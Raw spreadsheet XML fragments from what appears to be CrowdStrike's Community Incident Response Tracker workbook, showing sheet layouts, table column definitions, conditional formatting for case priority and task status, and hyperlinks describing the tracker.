    <xdr:ext cx="3829050" cy="2009775"/>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588C24-4E53-4F95-B3DC-4552F270EF91}" name="Table1" displayName="Table1" ref="A1:D17" totalsRowShown="0" headerRowDxfId="26" headerRowBorderDxfId="25" tableBorderDxfId="24" headerRowCellStyle="Normal 2" dataCellStyle="Normal 2">
  <autoFilter ref="A1:D17" xr:uid="{27588C24-4E53-4F95-B3DC-4552F270EF91}"/>
  <tableColumns count="4">
    <tableColumn id="1" xr3:uid="{A05716F5-3549-477B-8065-EEFCE1ED2087}" name="Field" dataCellStyle="Normal 2"/>
    <tableColumn id="2" xr3:uid="{4D0DB43C-D7D3-4CF5-B3F4-EA4F9C516C0E}" name="Description" dataCellStyle="Normal 2"/>
    <tableColumn id="3" xr3:uid="{7E6FBF2E-18C1-473B-A006-7179FE934A0B}" name="Source Plugin(s)" dataCellStyle="Normal 2"/>
    <tableColumn id="4" xr3:uid="{F68DC116-CB69-427E-96FD-429ED2DBB6BD}" name="Notes" dataCellStyle="Normal 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crowdstrike.com/blog/crowdstrike-releases-digital-forensics-and-incident-response-tracker/" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://insert-link-here/"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00"/>
    <outlinePr summaryBelow="0" summaryRight="0"/>
  </sheetPr>
  <dimension ref="A1:J21"/>
  <sheetViews>
    <sheetView showGridLines="0" workbookViewId="0">
      <selection activeCell="B2" sqref="B2:I2"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultColWidth="14.44140625" defaultRowHeight="15.75" customHeight="1"/>
  <cols>
    <col min="1" max="1" width="3" customWidth="1"/>
    <col min="9" max="9" width="15.77734375" customWidth="1"/>
    <col min="10" max="10" width="3" customWidth="1"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:10" ht="13.2">
      <c r="A1" s="1"/>
      <c r="B1" s="1"/>
      <c r="C1" s="1"/>
      <c r="D1" s="1"/>
      <c r="E1" s="1"/>
      <c r="F1" s="1"/>
      <c r="G1" s="1"/>
      <c r="H1" s="1"/>
      <c r="I1" s="1"/>
      <c r="J1" s="1"/>
    </row>
    <row r="2" spans="1:10" ht="22.5" customHeight="1">
      <c r="A2" s="1"/>
      <c r="B2" s="198" t="s">
        <v>0</v>
      </c>
      <c r="C2" s="197"/>
      <c r="D2" s="197"/>
      <c r="E2" s="197"/>
      <c r="F2" s="197"/>
      <c r="G2" s="197"/>
      <c r="H2" s="197"/>
      <c r="I2" s="197"/>
      <c r="J2" s="1"/>
    </row>
    <row r="3" spans="1:10" ht="13.2">
      <c r="B3" s="2"/>
      <c r="C3" s="2"/>
      <c r="D3" s="2"/>
      <c r="E3" s="2"/>
      <c r="F3" s="2"/>
      <c r="G3" s="2"/>
      <c r="H3" s="2"/>
    </row>
    <row r="4" spans="1:10" ht="48.75" customHeight="1">
      <c r="A4" s="1"/>
      <c r="B4" s="199" t="s">
        <v>183</v>
      </c>
      <c r="C4" s="200"/>
      <c r="D4" s="200"/>
      <c r="E4" s="200"/>
      <c r="F4" s="200"/>
      <c r="G4" s="200"/>
      <c r="H4" s="200"/>
    </row>
    <row r="5" spans="1:10" ht="13.2">
      <c r="H5" s="2"/>
    </row>
    <row r="6" spans="1:10" ht="13.2">
      <c r="H6" s="2"/>
    </row>
    <row r="7" spans="1:10" ht="13.2">
      <c r="H7" s="2"/>
    </row>
    <row r="8" spans="1:10" ht="13.2">
      <c r="H8" s="2"/>
    </row>
    <row r="9" spans="1:10" ht="22.5" customHeight="1">
      <c r="B9" s="201" t="s">
        <v>184</v>
      </c>
      <c r="C9" s="197"/>
      <c r="D9" s="197"/>
      <c r="E9" s="197"/>
      <c r="F9" s="197"/>
      <c r="G9" s="197"/>
      <c r="H9" s="197"/>
      <c r="I9" s="197"/>
    </row>
    <row r="10" spans="1:10" ht="13.8">
      <c r="B10" s="202" t="s">
        <v>1</v>
      </c>
      <c r="C10" s="197"/>
      <c r="D10" s="197"/>
      <c r="E10" s="197"/>
      <c r="F10" s="197"/>
      <c r="G10" s="2"/>
      <c r="H10" s="2"/>
      <c r="I10" s="2"/>
    </row>
    <row r="11" spans="1:10" ht="13.8">
      <c r="B11" s="196" t="s">
        <v>2</v>
      </c>
      <c r="C11" s="197"/>
      <c r="D11" s="196" t="s">
        <v>3</v>
      </c>
      <c r="E11" s="197"/>
      <c r="F11" s="197"/>
      <c r="G11" s="197"/>
      <c r="H11" s="197"/>
      <c r="I11" s="197"/>
    </row>
    <row r="12" spans="1:10" ht="13.8">
      <c r="B12" s="196" t="s">
        <v>4</v>
      </c>
      <c r="C12" s="197"/>
      <c r="D12" s="196" t="s">
        <v>5</v>
      </c>
      <c r="E12" s="197"/>
      <c r="F12" s="197"/>
      <c r="G12" s="197"/>
      <c r="H12" s="197"/>
      <c r="I12" s="197"/>
    </row>
    <row r="13" spans="1:10" ht="13.8">
      <c r="B13" s="196" t="s">
        <v>6</v>
      </c>
      <c r="C13" s="197"/>
      <c r="D13" s="196" t="s">
        <v>7</v>
      </c>
      <c r="E13" s="197"/>
      <c r="F13" s="197"/>
      <c r="G13" s="197"/>
      <c r="H13" s="197"/>
      <c r="I13" s="197"/>
    </row>
    <row r="14" spans="1:10" ht="13.8">
      <c r="B14" s="196" t="s">
        <v>8</v>
      </c>
      <c r="C14" s="197"/>
      <c r="D14" s="196" t="s">
        <v>9</v>
      </c>
      <c r="E14" s="197"/>
      <c r="F14" s="197"/>
      <c r="G14" s="197"/>
      <c r="H14" s="197"/>
      <c r="I14" s="197"/>
    </row>
    <row r="15" spans="1:10" ht="13.8">
      <c r="B15" s="196" t="s">
        <v>10</v>
      </c>
      <c r="C15" s="197"/>
      <c r="D15" s="196" t="s">
        <v>11</v>
      </c>
      <c r="E15" s="197"/>
      <c r="F15" s="197"/>
      <c r="G15" s="197"/>
      <c r="H15" s="197"/>
      <c r="I15" s="197"/>
    </row>
    <row r="16" spans="1:10" ht="13.8">
      <c r="B16" s="196" t="s">
        <v>12</v>
      </c>
      <c r="C16" s="197"/>
      <c r="D16" s="196" t="s">
        <v>13</v>
      </c>
      <c r="E16" s="197"/>
      <c r="F16" s="197"/>
      <c r="G16" s="197"/>
      <c r="H16" s="197"/>
      <c r="I16" s="197"/>
    </row>
    <row r="17" spans="2:9" ht="13.8">
      <c r="B17" s="196" t="s">
        <v>14</v>
      </c>
      <c r="C17" s="197"/>
      <c r="D17" s="196" t="s">
        <v>15</v>
      </c>
      <c r="E17" s="197"/>
      <c r="F17" s="197"/>
      <c r="G17" s="197"/>
      <c r="H17" s="197"/>
      <c r="I17" s="197"/>
    </row>
    <row r="18" spans="2:9" ht="13.8">
      <c r="B18" s="196" t="s">
        <v>16</v>
      </c>
      <c r="C18" s="197"/>
      <c r="D18" s="196" t="s">
        <v>17</v>
      </c>
      <c r="E18" s="197"/>
      <c r="F18" s="197"/>
      <c r="G18" s="197"/>
      <c r="H18" s="197"/>
      <c r="I18" s="197"/>
    </row>
    <row r="19" spans="2:9" ht="13.8">
      <c r="B19" s="196" t="s">
        <v>18</v>
      </c>
      <c r="C19" s="197"/>
      <c r="D19" s="196" t="s">
        <v>19</v>
      </c>
      <c r="E19" s="197"/>
      <c r="F19" s="197"/>
      <c r="G19" s="197"/>
      <c r="H19" s="197"/>
      <c r="I19" s="197"/>
    </row>
    <row r="20" spans="2:9" ht="13.8">
      <c r="B20" s="196" t="s">
        <v>20</v>
      </c>
      <c r="C20" s="197"/>
      <c r="D20" s="196" t="s">
        <v>21</v>
      </c>
      <c r="E20" s="197"/>
      <c r="F20" s="197"/>
      <c r="G20" s="197"/>
      <c r="H20" s="197"/>
      <c r="I20" s="197"/>
    </row>
    <row r="21" spans="2:9" ht="13.8">
      <c r="B21" s="196" t="s">
        <v>22</v>
      </c>
      <c r="C21" s="197"/>
      <c r="D21" s="196" t="s">
        <v>23</v>
      </c>
      <c r="E21" s="197"/>
      <c r="F21" s="2"/>
      <c r="G21" s="2"/>
      <c r="H21" s="2"/>
      <c r="I21" s="2"/>
    </row>
  </sheetData>
  <mergeCells count="27">
    <mergeCell ref="B19:C19"/>
    <mergeCell ref="D19:E19"/>
    <mergeCell ref="B20:C20"/>
    <mergeCell ref="D20:E20"/>
    <mergeCell ref="B21:C21"/>
    <mergeCell ref="D21:E21"/>
    <mergeCell ref="D16:E16"/>
    <mergeCell ref="B17:C17"/>
    <mergeCell ref="D17:E17"/>
    <mergeCell ref="B18:C18"/>
    <mergeCell ref="D18:E18"/>
    <mergeCell ref="D13:E13"/>
    <mergeCell ref="B14:C14"/>
    <mergeCell ref="D14:E14"/>
    <mergeCell ref="B2:I2"/>
    <mergeCell ref="B4:H4"/>
    <mergeCell ref="B9:I9"/>
    <mergeCell ref="B11:C11"/>
    <mergeCell ref="D11:E11"/>
    <mergeCell ref="F11:I20"/>
    <mergeCell ref="D12:E12"/>
    <mergeCell ref="B10:F10"/>
    <mergeCell ref="B12:C12"/>
    <mergeCell ref="B13:C13"/>
    <mergeCell ref="B15:C15"/>
    <mergeCell ref="D15:E15"/>
    <mergeCell ref="B16:C16"/>
  </mergeCells>
  <hyperlinks>
    <hyperlink ref="B4" r:id="rId1" display="This Community IR Tracker is provided by CrowdStrike Services for anyone that wishes to track data for an investigation. The blog that discusses some of the reasons for and uses of the tracker can be found at [https://insert-link-here]" xr:uid="{00000000-0004-0000-0000-000000000000}"/>
    <hyperlink ref="B4:H4" r:id="rId2" display="The CrowdStrike Incident Response Tracker is provided to the DFIR community by CrowdStrike Services for anyone that wishes to track data for an investigation. For more information about the reasons for and uses of this tracker, read this blog: https://www" xr:uid="{5739CA8A-766E-084A-9EF7-B8926B2922AF}"/>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C4587"/>
    <outlinePr summaryBelow="0" summaryRight="0"/>
  </sheetPr>
  <dimension ref="A1:L17"/>
  <sheetViews>
    <sheetView showGridLines="0" workbookViewId="0"/>
  </sheetViews>
  <sheetFormatPr defaultColWidth="14.44140625" defaultRowHeight="15.75" customHeight="1"/>
  <cols>
    <col min="1" max="1" width="3" customWidth="1"/>
    <col min="2" max="2" width="14.44140625" customWidth="1"/>
    <col min="4" max="4" width="7.6640625" customWidth="1"/>
    <col min="5" max="5" width="30.44140625" customWidth="1"/>
    <col min="6" max="7" width="52.33203125" customWidth="1"/>
    <col min="8" max="8" width="15.6640625" customWidth="1"/>
    <col min="9" max="9" width="22.44140625" customWidth="1"/>
    <col min="10" max="11" width="18.44140625" customWidth="1"/>
    <col min="12" max="12" width="3" customWidth="1"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:12" ht="15.75" customHeight="1">
      <c r="A1" s="47"/>
      <c r="B1" s="47"/>
      <c r="C1" s="23"/>
      <c r="D1" s="1"/>
      <c r="E1" s="1"/>
      <c r="F1" s="1"/>
      <c r="G1" s="1"/>
      <c r="H1" s="1"/>
      <c r="I1" s="1"/>
      <c r="J1" s="1"/>
      <c r="K1" s="1"/>
      <c r="L1" s="1"/>
    </row>
    <row r="2" spans="1:12" ht="15.75" customHeight="1">
      <c r="A2" s="48"/>
      <c r="B2" s="49" t="s">
        <v>24</v>
      </c>
      <c r="C2" s="50" t="s">
        <v>100</v>
      </c>
      <c r="D2" s="51" t="s">
        <v>101</v>
      </c>
      <c r="E2" s="52" t="s">
        <v>102</v>
      </c>
      <c r="F2" s="52" t="s">
        <v>103</v>
      </c>
      <c r="G2" s="52" t="s">
        <v>104</v>
      </c>
      <c r="H2" s="52" t="s">
        <v>105</v>
      </c>
      <c r="I2" s="52" t="s">
        <v>53</v>
      </c>
      <c r="J2" s="52" t="s">
        <v>106</v>
      </c>
      <c r="K2" s="52" t="s">
        <v>107</v>
      </c>
      <c r="L2" s="53"/>
    </row>
    <row r="3" spans="1:12" ht="15.75" customHeight="1">
      <c r="A3" s="54"/>
      <c r="B3" s="55"/>
      <c r="C3" s="56"/>
      <c r="D3" s="57" t="s">
        <v>108</v>
      </c>
      <c r="E3" s="56"/>
      <c r="F3" s="58"/>
      <c r="G3" s="56"/>
      <c r="H3" s="56"/>
      <c r="I3" s="56"/>
      <c r="J3" s="59"/>
      <c r="K3" s="59"/>
      <c r="L3" s="24"/>
    </row>
    <row r="4" spans="1:12" ht="15.75" customHeight="1">
      <c r="A4" s="54"/>
      <c r="B4" s="60"/>
      <c r="C4" s="56"/>
      <c r="D4" s="57" t="s">
        <v>109</v>
      </c>
      <c r="E4" s="56"/>
      <c r="F4" s="56"/>
      <c r="G4" s="56"/>
      <c r="H4" s="56"/>
      <c r="I4" s="56"/>
      <c r="J4" s="59"/>
      <c r="K4" s="59"/>
      <c r="L4" s="24"/>
    </row>
    <row r="5" spans="1:12" ht="15.75" customHeight="1">
      <c r="A5" s="54"/>
      <c r="B5" s="60"/>
      <c r="C5" s="56"/>
      <c r="D5" s="57" t="s">
        <v>110</v>
      </c>
      <c r="E5" s="56"/>
      <c r="F5" s="56"/>
      <c r="G5" s="56"/>
      <c r="H5" s="56"/>
      <c r="I5" s="56"/>
      <c r="J5" s="59"/>
      <c r="K5" s="59"/>
      <c r="L5" s="24"/>
    </row>
    <row r="6" spans="1:12" ht="15.75" customHeight="1">
      <c r="A6" s="54"/>
      <c r="B6" s="60"/>
      <c r="C6" s="56"/>
      <c r="D6" s="57" t="s">
        <v>111</v>
      </c>
      <c r="E6" s="56"/>
      <c r="F6" s="56"/>
      <c r="G6" s="56"/>
      <c r="H6" s="56"/>
      <c r="I6" s="56"/>
      <c r="J6" s="59"/>
      <c r="K6" s="59"/>
      <c r="L6" s="24"/>
    </row>
    <row r="7" spans="1:12" ht="15.75" customHeight="1">
      <c r="A7" s="54"/>
      <c r="B7" s="60"/>
      <c r="C7" s="56"/>
      <c r="D7" s="57" t="s">
        <v>112</v>
      </c>
      <c r="E7" s="56"/>
      <c r="F7" s="58"/>
      <c r="G7" s="56"/>
      <c r="H7" s="56"/>
      <c r="I7" s="56"/>
      <c r="J7" s="59"/>
      <c r="K7" s="59"/>
      <c r="L7" s="24"/>
    </row>
    <row r="8" spans="1:12" ht="15.75" customHeight="1">
      <c r="A8" s="54"/>
      <c r="B8" s="60"/>
      <c r="C8" s="56"/>
      <c r="D8" s="57" t="s">
        <v>113</v>
      </c>
      <c r="E8" s="56"/>
      <c r="F8" s="58"/>
      <c r="G8" s="56"/>
      <c r="H8" s="56"/>
      <c r="I8" s="56"/>
      <c r="J8" s="59"/>
      <c r="K8" s="59"/>
      <c r="L8" s="24"/>
    </row>
    <row r="9" spans="1:12" ht="15.75" customHeight="1">
      <c r="A9" s="54"/>
      <c r="B9" s="60"/>
      <c r="C9" s="56"/>
      <c r="D9" s="57" t="s">
        <v>114</v>
      </c>
      <c r="E9" s="56"/>
      <c r="F9" s="58"/>
      <c r="G9" s="56"/>
      <c r="H9" s="56"/>
      <c r="I9" s="56"/>
      <c r="J9" s="59"/>
      <c r="K9" s="59"/>
      <c r="L9" s="24"/>
    </row>
    <row r="10" spans="1:12" ht="15.75" customHeight="1">
      <c r="A10" s="23"/>
      <c r="B10" s="61"/>
      <c r="C10" s="61"/>
      <c r="D10" s="57" t="s">
        <v>115</v>
      </c>
      <c r="E10" s="59"/>
      <c r="F10" s="59"/>
      <c r="G10" s="59"/>
      <c r="H10" s="59"/>
      <c r="I10" s="59"/>
      <c r="J10" s="59"/>
      <c r="K10" s="59"/>
      <c r="L10" s="24"/>
    </row>
    <row r="11" spans="1:12" ht="15.75" customHeight="1">
      <c r="A11" s="23"/>
      <c r="B11" s="61"/>
      <c r="C11" s="61"/>
      <c r="D11" s="57" t="s">
        <v>116</v>
      </c>
      <c r="E11" s="59"/>
      <c r="F11" s="59"/>
      <c r="G11" s="59"/>
      <c r="H11" s="59"/>
      <c r="I11" s="59"/>
      <c r="J11" s="59"/>
      <c r="K11" s="59"/>
      <c r="L11" s="24"/>
    </row>
    <row r="12" spans="1:12" ht="15.75" customHeight="1">
      <c r="A12" s="23"/>
      <c r="B12" s="61"/>
      <c r="C12" s="61"/>
      <c r="D12" s="57" t="s">
        <v>117</v>
      </c>
      <c r="E12" s="59"/>
      <c r="F12" s="59"/>
      <c r="G12" s="59"/>
      <c r="H12" s="59"/>
      <c r="I12" s="59"/>
      <c r="J12" s="59"/>
      <c r="K12" s="59"/>
      <c r="L12" s="24"/>
    </row>
    <row r="13" spans="1:12" ht="15.75" customHeight="1">
      <c r="A13" s="23"/>
      <c r="B13" s="61"/>
      <c r="C13" s="61"/>
      <c r="D13" s="57" t="s">
        <v>118</v>
      </c>
      <c r="E13" s="59"/>
      <c r="F13" s="34"/>
      <c r="G13" s="59"/>
      <c r="H13" s="59"/>
      <c r="I13" s="59"/>
      <c r="J13" s="59"/>
      <c r="K13" s="59"/>
      <c r="L13" s="24"/>
    </row>
    <row r="14" spans="1:12" ht="15.75" customHeight="1">
      <c r="A14" s="23"/>
      <c r="B14" s="61"/>
      <c r="C14" s="61"/>
      <c r="D14" s="57" t="s">
        <v>119</v>
      </c>
      <c r="E14" s="59"/>
      <c r="F14" s="59"/>
      <c r="G14" s="59"/>
      <c r="H14" s="59"/>
      <c r="I14" s="59"/>
      <c r="J14" s="59"/>
      <c r="K14" s="59"/>
      <c r="L14" s="24"/>
    </row>
    <row r="15" spans="1:12" ht="15.75" customHeight="1">
      <c r="A15" s="23"/>
      <c r="B15" s="61"/>
      <c r="C15" s="61"/>
      <c r="D15" s="57" t="s">
        <v>120</v>
      </c>
      <c r="E15" s="59"/>
      <c r="F15" s="59"/>
      <c r="G15" s="59"/>
      <c r="H15" s="59"/>
      <c r="I15" s="56"/>
      <c r="J15" s="59"/>
      <c r="K15" s="59"/>
      <c r="L15" s="24"/>
    </row>
    <row r="16" spans="1:12" ht="15.75" customHeight="1">
      <c r="A16" s="23"/>
      <c r="B16" s="61"/>
      <c r="C16" s="61"/>
      <c r="D16" s="57" t="s">
        <v>121</v>
      </c>
      <c r="E16" s="59"/>
      <c r="F16" s="59"/>
      <c r="G16" s="59"/>
      <c r="H16" s="59"/>
      <c r="I16" s="59"/>
      <c r="J16" s="59"/>
      <c r="K16" s="59"/>
      <c r="L16" s="24"/>
    </row>
    <row r="17" spans="1:12" ht="15.75" customHeight="1">
      <c r="A17" s="23"/>
      <c r="B17" s="61"/>
      <c r="C17" s="61"/>
      <c r="D17" s="57" t="s">
        <v>122</v>
      </c>
      <c r="E17" s="59"/>
      <c r="F17" s="59"/>
      <c r="G17" s="59"/>
      <c r="H17" s="59"/>
      <c r="I17" s="59"/>
      <c r="J17" s="59"/>
      <c r="K17" s="59"/>
      <c r="L17" s="24"/>
    </row>
  </sheetData>
  <conditionalFormatting sqref="C3:C17">
    <cfRule type="cellIs" dxfId="11" priority="8" operator="equal">
      <formula>"Low"</formula>
    </cfRule>
    <cfRule type="cellIs" dxfId="10" priority="9" operator="equal">
      <formula>"Medium"</formula>
    </cfRule>
    <cfRule type="cellIs" dxfId="9" priority="10" operator="equal">
      <formula>"High"</formula>
    </cfRule>
    <cfRule type="cellIs" dxfId="8" priority="11" operator="equal">
      <formula>"Urgent"</formula>
    </cfRule>
    <cfRule type="cellIs" dxfId="7" priority="12" operator="equal">
      <formula>"N/A"</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="F3">
    <cfRule type="expression" dxfId="6" priority="1">
      <formula>COUNTIF(F:F,F3)&gt;1</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="I2:I17">
    <cfRule type="containsText" dxfId="5" priority="2" operator="containsText" text="Complete">
      <formula>NOT(ISERROR(SEARCH(("Complete"),(I2))))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="4" priority="3" operator="containsText" text="Not">
      <formula>NOT(ISERROR(SEARCH(("Not"),(I2))))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="3" priority="4" operator="containsText" text="In Progress">
      <formula>NOT(ISERROR(SEARCH(("In Progress"),(I2))))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="2" priority="5" operator="containsText" text="Delayed">
      <formula>NOT(ISERROR(SEARCH(("Delayed"),(I2))))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="1" priority="6" operator="containsText" text="No Longer Needed">
      <formula>NOT(ISERROR(SEARCH(("No Longer Needed"),(I2))))</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="I6">
    <cfRule type="containsText" dxfId="0" priority="7" operator="containsText" text="On Hold">
      <formula>NOT(ISERROR(SEARCH(("On Hold"),(I6))))</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C4587"/>
    <outlinePr summaryBelow="0" summaryRight="0"/>
  </sheetPr>
  <dimension ref="A1:J17"/>
  <sheetViews>
    <sheetView showGridLines="0" workbookViewId="0"/>
  </sheetViews>
  <sheetFormatPr defaultColWidth="14.44140625" defaultRowHeight="15.75" customHeight="1"/>
  <cols>
    <col min="1" max="1" width="3" customWidth="1"/>
    <col min="2" max="2" width="12" customWidth="1"/>
    <col min="3" max="3" width="26.33203125" customWidth="1"/>
    <col min="4" max="4" width="19.109375" customWidth="1"/>
    <col min="5" max="5" width="17.33203125" customWidth="1"/>
    <col min="6" max="6" width="38.109375" customWidth="1"/>
    <col min="7" max="7" width="32.44140625" customWidth="1"/>
    <col min="8" max="8" width="32.33203125" customWidth="1"/>
    <col min="9" max="9" width="67" customWidth="1"/>
    <col min="10" max="10" width="3" customWidth="1"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:10" ht="15.75" customHeight="1">
      <c r="A1" s="62"/>
      <c r="B1" s="62"/>
      <c r="C1" s="62"/>
      <c r="D1" s="1"/>
      <c r="E1" s="1"/>
      <c r="F1" s="62"/>
      <c r="G1" s="62"/>
      <c r="H1" s="62"/>
      <c r="I1" s="62"/>
      <c r="J1" s="62"/>
    </row>
    <row r="2" spans="1:10" ht="15.75" customHeight="1">
      <c r="A2" s="62"/>
      <c r="B2" s="63" t="s">
        <v>123</v>
      </c>
      <c r="C2" s="63" t="s">
        <v>124</v>
      </c>
      <c r="D2" s="64" t="s">
        <v>41</v>
      </c>
      <c r="E2" s="64" t="s">
        <v>125</v>
      </c>
      <c r="F2" s="65" t="s">
        <v>126</v>
      </c>
      <c r="G2" s="65" t="s">
        <v>127</v>
      </c>
      <c r="H2" s="65" t="s">
        <v>128</v>
      </c>
      <c r="I2" s="66" t="s">
        <v>26</v>
      </c>
      <c r="J2" s="62"/>
    </row>
    <row r="3" spans="1:10" ht="15.75" customHeight="1">
      <c r="A3" s="62"/>
      <c r="B3" s="67" t="s">
        <v>129</v>
      </c>
      <c r="C3" s="68"/>
      <c r="D3" s="8"/>
      <c r="E3" s="8"/>
      <c r="F3" s="8"/>
      <c r="G3" s="68"/>
      <c r="H3" s="8"/>
      <c r="I3" s="46"/>
      <c r="J3" s="1"/>
    </row>
    <row r="4" spans="1:10" ht="15.75" customHeight="1">
      <c r="A4" s="62"/>
      <c r="B4" s="67" t="s">
        <v>130</v>
      </c>
      <c r="C4" s="8"/>
      <c r="D4" s="8"/>
      <c r="E4" s="8"/>
      <c r="F4" s="8"/>
      <c r="G4" s="8"/>
      <c r="H4" s="8"/>
      <c r="I4" s="46"/>
      <c r="J4" s="1"/>
    </row>
    <row r="5" spans="1:10" ht="15.75" customHeight="1">
      <c r="A5" s="62"/>
      <c r="B5" s="67" t="s">
        <v>131</v>
      </c>
      <c r="C5" s="8"/>
      <c r="D5" s="8"/>
      <c r="E5" s="8"/>
      <c r="F5" s="8"/>
      <c r="G5" s="8"/>
      <c r="H5" s="8"/>
      <c r="I5" s="46"/>
      <c r="J5" s="1"/>
    </row>
    <row r="6" spans="1:10" ht="15.75" customHeight="1">
      <c r="A6" s="62"/>
      <c r="B6" s="67" t="s">
        <v>132</v>
      </c>
      <c r="C6" s="8"/>
      <c r="D6" s="8"/>
      <c r="E6" s="8"/>
      <c r="F6" s="8"/>
      <c r="G6" s="8"/>
      <c r="H6" s="8"/>
      <c r="I6" s="46"/>
      <c r="J6" s="1"/>
    </row>
    <row r="7" spans="1:10" ht="15.75" customHeight="1">
      <c r="A7" s="62"/>
      <c r="B7" s="67" t="s">
        <v>133</v>
      </c>
      <c r="C7" s="8"/>
      <c r="D7" s="8"/>
      <c r="E7" s="8"/>
      <c r="F7" s="8"/>
      <c r="G7" s="8"/>
      <c r="H7" s="8"/>
      <c r="I7" s="46"/>
      <c r="J7" s="1"/>
    </row>
    <row r="8" spans="1:10" ht="15.75" customHeight="1">
      <c r="A8" s="62"/>
      <c r="B8" s="67" t="s">
        <v>134</v>
      </c>
      <c r="C8" s="8"/>
      <c r="D8" s="8"/>
      <c r="E8" s="8"/>
      <c r="F8" s="8"/>
      <c r="G8" s="8"/>
      <c r="H8" s="8"/>
      <c r="I8" s="46"/>
      <c r="J8" s="1"/>
    </row>
    <row r="9" spans="1:10" ht="15.75" customHeight="1">
      <c r="A9" s="62"/>
      <c r="B9" s="67" t="s">
        <v>135</v>
      </c>
      <c r="C9" s="8"/>
      <c r="D9" s="8"/>
      <c r="E9" s="8"/>
      <c r="F9" s="8"/>
      <c r="G9" s="8"/>
      <c r="H9" s="8"/>
      <c r="I9" s="46"/>
      <c r="J9" s="1"/>
    </row>
    <row r="10" spans="1:10" ht="15.75" customHeight="1">
      <c r="A10" s="62"/>
      <c r="B10" s="67" t="s">
        <v>136</v>
      </c>
      <c r="C10" s="8"/>
      <c r="D10" s="8"/>
      <c r="E10" s="8"/>
      <c r="F10" s="8"/>
      <c r="G10" s="68"/>
      <c r="H10" s="8"/>
      <c r="I10" s="46"/>
      <c r="J10" s="1"/>
    </row>
    <row r="11" spans="1:10" ht="15.75" customHeight="1">
      <c r="A11" s="62"/>
      <c r="B11" s="67" t="s">
        <v>137</v>
      </c>
      <c r="C11" s="8"/>
      <c r="D11" s="8"/>
      <c r="E11" s="8"/>
      <c r="F11" s="8"/>
      <c r="G11" s="8"/>
      <c r="H11" s="8"/>
      <c r="I11" s="46"/>
      <c r="J11" s="1"/>
    </row>
    <row r="12" spans="1:10" ht="15.75" customHeight="1">
      <c r="A12" s="62"/>
      <c r="B12" s="67" t="s">
        <v>138</v>
      </c>
      <c r="C12" s="8"/>
      <c r="D12" s="8"/>
      <c r="E12" s="8"/>
      <c r="F12" s="8"/>
      <c r="G12" s="8"/>
      <c r="H12" s="8"/>
      <c r="I12" s="46"/>
      <c r="J12" s="1"/>
    </row>
    <row r="13" spans="1:10" ht="15.75" customHeight="1">
      <c r="A13" s="62"/>
      <c r="B13" s="67" t="s">
        <v>139</v>
      </c>
      <c r="C13" s="8"/>
      <c r="D13" s="8"/>
      <c r="E13" s="8"/>
      <c r="F13" s="8"/>
      <c r="G13" s="68"/>
      <c r="H13" s="8"/>
      <c r="I13" s="46"/>
      <c r="J13" s="1"/>
    </row>
    <row r="14" spans="1:10" ht="15.75" customHeight="1">
      <c r="A14" s="62"/>
      <c r="B14" s="67" t="s">
        <v>140</v>
      </c>
      <c r="C14" s="8"/>
      <c r="D14" s="8"/>
      <c r="E14" s="8"/>
      <c r="F14" s="8"/>
      <c r="G14" s="68"/>
      <c r="H14" s="8"/>
      <c r="I14" s="46"/>
      <c r="J14" s="1"/>
    </row>
    <row r="15" spans="1:10" ht="15.75" customHeight="1">
      <c r="A15" s="62"/>
      <c r="B15" s="67" t="s">
        <v>141</v>
      </c>
      <c r="C15" s="8"/>
      <c r="D15" s="8"/>
      <c r="E15" s="8"/>
      <c r="F15" s="8"/>
      <c r="G15" s="68"/>
      <c r="H15" s="8"/>
      <c r="I15" s="46"/>
      <c r="J15" s="1"/>
    </row>
    <row r="16" spans="1:10" ht="15.75" customHeight="1">
      <c r="A16" s="62"/>
      <c r="B16" s="67" t="s">
        <v>142</v>
      </c>
      <c r="C16" s="8"/>
      <c r="D16" s="8"/>
      <c r="E16" s="8"/>
      <c r="F16" s="8"/>
      <c r="G16" s="68"/>
      <c r="H16" s="8"/>
      <c r="I16" s="46"/>
      <c r="J16" s="1"/>
    </row>
    <row r="17" spans="1:10" ht="15.75" customHeight="1">
      <c r="A17" s="62"/>
      <c r="B17" s="67" t="s">
        <v>143</v>
      </c>
      <c r="C17" s="8"/>
      <c r="D17" s="8"/>
      <c r="E17" s="8"/>
      <c r="F17" s="8"/>
      <c r="G17" s="68"/>
      <c r="H17" s="8"/>
      <c r="I17" s="46"/>
      <c r="J17"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666666"/>
    <outlinePr summaryBelow="0" summaryRight="0"/>
  </sheetPr>
  <dimension ref="A1:E17"/>
  <sheetViews>
    <sheetView showGridLines="0" workbookViewId="0"/>
  </sheetViews>
  <sheetFormatPr defaultColWidth="14.44140625" defaultRowHeight="15.75" customHeight="1"/>
  <cols>
    <col min="1" max="1" width="3" customWidth="1"/>
    <col min="2" max="2" width="11.44140625" customWidth="1"/>
    <col min="3" max="3" width="67.44140625" customWidth="1"/>
    <col min="4" max="4" width="56.44140625" customWidth="1"/>
    <col min="5" max="5" width="3" customWidth="1"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:5" ht="15.75" customHeight="1">
      <c r="A1" s="62"/>
      <c r="B1" s="62"/>
      <c r="C1" s="62"/>
      <c r="D1" s="62"/>
      <c r="E1" s="62"/>
    </row>
    <row r="2" spans="1:5" ht="15.75" customHeight="1">
      <c r="A2" s="62"/>
      <c r="B2" s="69" t="s">
        <v>144</v>
      </c>
      <c r="C2" s="65" t="s">
        <v>145</v>
      </c>
      <c r="D2" s="66" t="s">
        <v>26</v>
      </c>
      <c r="E2" s="62"/>
    </row>
    <row r="3" spans="1:5" ht="15.75" customHeight="1">
      <c r="A3" s="1"/>
      <c r="B3" s="34" t="s">
        <v>146</v>
      </c>
      <c r="C3" s="34" t="s">
        <v>147</v>
      </c>
      <c r="D3" s="46"/>
      <c r="E3" s="1"/>
    </row>
    <row r="4" spans="1:5" ht="15.75" customHeight="1">
      <c r="B4" s="34" t="s">
        <v>148</v>
      </c>
